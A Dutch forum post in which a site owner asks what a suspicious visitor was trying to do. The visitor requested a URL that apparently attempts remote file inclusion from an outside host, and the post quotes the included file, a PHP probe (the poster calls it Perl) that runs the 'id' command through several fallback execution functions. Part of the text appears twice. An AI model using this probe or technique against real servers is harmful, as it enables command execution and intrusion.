Ik was net ff mijn bezoekers aan het monitoren, zie ik daar een bezoeker wat het volgende adres aan het bekijken was:
http://domein.com/index.p...www.thiaguinho.net/id.txt?
Voor het geval id.txt niet meer beschikbaar is, hier is wat er in staat:
Ik weet aardig wat van PHP af, maar dit is perl en ik snap er echt niks van, dus als dit iets gevaarlijks is verwijder het maar, ik zeg al.. ik weet niet wat het is, daar wil ik juist achter komen.
De agent die hij gebruikte is: libwww-perl/5.79
Ik heb het IP ook nog, maar kweet niet of ik dat hier zomaar mag posten.
Iemand enig idee wat die gast probeerde te doen?
Ik geloof niet dat het een vriendelijke bezoeker was/is...
http://domein.com/index.p...www.thiaguinho.net/id.txt?
Voor het geval id.txt niet meer beschikbaar is, hier is wat er in staat:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| <?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit; |
Ik weet aardig wat van PHP af, maar dit is perl en ik snap er echt niks van, dus als dit iets gevaarlijks is verwijder het maar, ik zeg al.. ik weet niet wat het is, daar wil ik juist achter komen.
De agent die hij gebruikte is: libwww-perl/5.79
Ik heb het IP ook nog, maar kweet niet of ik dat hier zomaar mag posten.
Iemand enig idee wat die gast probeerde te doen?
Ik geloof niet dat het een vriendelijke bezoeker was/is...
Naatan.com - Blog & Wordpress Plugins | Divia-CMS.com (OpenSource) - Currently Recruiting!